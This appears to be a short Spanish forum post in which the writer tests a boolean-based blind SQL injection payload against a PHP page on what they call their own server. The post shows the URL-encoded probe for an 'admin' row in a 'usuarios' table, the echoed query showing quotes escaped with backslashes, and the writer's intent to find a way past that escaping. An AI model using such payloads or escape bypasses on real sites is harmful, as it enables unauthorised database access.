Acabo de probar con mi server y tras inyectar esto:
http://www.xxx.com/x.php?id=1%20AND%20(SELECT%20Count(*)%20FROM%20usuarios%20WHERE%20user='admin')%20%3E%200
la respuesta que me da es esta:
Datos=1 AND (SELECT Count(*) FROM usuarios WHERE user=\'admin\') > 0
CADENA=SELECT * FROM empresa WHERE codigo=1133 AND (SELECT Count(*) FROM usuarios WHERE user=\'admin\') > 0
Efevtivamente, esta cambiando ' por \' asi que habra que buscar una forma de saltarselo